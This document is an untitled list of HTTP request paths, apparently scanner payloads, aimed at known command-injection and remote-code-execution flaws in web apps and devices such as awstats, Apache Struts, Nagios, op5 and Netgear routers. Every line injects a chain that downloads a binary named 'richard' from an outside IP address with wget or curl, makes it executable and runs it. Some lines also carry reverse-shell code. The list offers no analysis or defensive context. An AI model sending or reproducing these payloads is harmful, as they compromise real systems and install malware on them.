Untitled

/?search[send][]=eval&search[send][]=Kernel.fork%20do%60wget http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; chmod +x richard; sh richard%60end
/VhttpdMgr?action=importFile&fileName=wget http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; chmod +x richard; sh richard
/awstatstotals/awstatstotals.php?sort=].passthru('echo%20YYY;wget http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; chmod +x richard; sh richard;echo%20YYY;').exit().%24a[
/cgi-bin/awstats.pl?migrate=|echo;echo%20YYY;wget http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; chmod +x richard; sh richard;echo%20YYY;echo|awstats
/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;wget http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; chmod +x richard; sh richard;%22
/cgi-bin/operator/servetest?cmd=wget http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; chmod +x richard; sh richard
/cgi-bin/script?wget http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; chmod +x richard; sh richard
/login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22wget http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; chmod +x richard; sh richard%22})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
/monitor/op5/nacoma/command_test.php?cmd_str=wget http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; chmod +x richard; sh richard
/nagios/cgi-bin/statuswml.cgi?ping=wget http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; chmod +x richard; sh richard%3Becho+%24PATH
/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; chmod +x richard; sh richard
/portal/apis/aggrecate_js.cgi?script=launcher%22%26python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((wget http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; chmod +x richard; sh richard))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27%22
/qsrserver/device/getThumbnail?sourceUri=\xe2\x80\x9d+-;rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f+|+/bin/sh+-i+2>&1+|+;wget http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; chmod +x richard; sh richard;&targetUri=/tmp/thumb/test.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&=1537275717150
/repository/annotate?rev=wget http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; chmod +x richard; sh richard
/scripts/rpc.php?action=updatetime&timeserver=||wget http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; chmod +x richard; sh richard
/setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;wget http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; chmod +x richard; sh richard aux&message=
/pgrade_handle.phpu?cmd=writeuploaddir&uploaddir=%27;wget http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; chmod +x richard; sh richard%205;%27
/webadmin/script?command=|wget http://80.82.67.184/richard; curl -O http://80.82.67.184/richard; chmod +x richard; sh richard